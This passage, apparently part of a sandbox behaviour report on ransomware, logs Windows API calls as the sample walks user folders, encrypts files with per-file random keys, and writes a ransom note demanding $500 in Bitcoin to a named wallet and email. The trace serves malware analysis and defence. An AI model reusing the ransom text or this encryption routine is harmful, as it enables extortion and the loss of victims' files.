lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.216] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.216] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\.") returned 69 [0089.216] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.216] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.216] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.216] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.216] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.216] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\..") returned 70 [0089.216] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.216] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.216] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\RESTORE_FILES.txt") returned 85 [0089.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.217] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.217] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.218] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.218] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.218] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.218] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.218] CloseHandle (hObject=0xd8) returned 1 [0089.218] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="Windows") returned -1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files") returned -1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files (x86)") returned -1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="$Recycle.bin") returned 1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="System Volume Information") returned -1 [0089.218] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1") returned 68 [0089.218] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0089.218] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0089.218] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*") returned 70 [0089.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.219] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.219] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.219] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.219] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\.") returned 70 [0089.219] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.219] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.219] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.219] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.219] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.219] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.219] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\..") returned 71 [0089.219] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.219] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.219] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.219] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt") returned 86 [0089.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp8_1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.220] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.220] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.221] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.221] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.221] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.221] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.221] CloseHandle (hObject=0xd8) returned 1 [0089.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="Windows") returned -1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files") returned -1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files (x86)") returned -1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="$Recycle.bin") returned 1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="System Volume Information") returned -1 [0089.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0") returned 68 [0089.221] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0089.221] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0089.221] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*") returned 70 [0089.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.221] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.221] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.222] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.222] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.222] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\.") returned 70 [0089.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.222] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.222] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.222] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.222] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.222] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.222] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\..") returned 71 [0089.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.222] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.222] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.222] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt") returned 86 [0089.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.222] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.222] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.223] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.223] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.223] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.223] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.223] CloseHandle (hObject=0xd8) returned 1 [0089.223] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0089.223] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned 78 [0089.223] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0089.223] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0089.224] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*") returned 80 [0089.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.224] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.") returned 80 [0089.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.224] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.224] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.224] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.224] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.224] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.225] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\..") returned 81 [0089.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.225] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.225] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.225] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.225] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.225] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="Windows") returned -1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files") returned -1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files (x86)") returned -1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="$Recycle.bin") returned 1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="System Volume Information") returned -1 [0089.225] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore") returned 87 [0089.225] lstrcmpW (lpString1="DOMStore", lpString2=".") returned 1 [0089.225] lstrcmpW (lpString1="DOMStore", lpString2="..") returned 1 [0089.225] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*") returned 89 [0089.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.225] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.225] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\.") returned 89 [0089.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.226] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.226] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.226] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.226] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 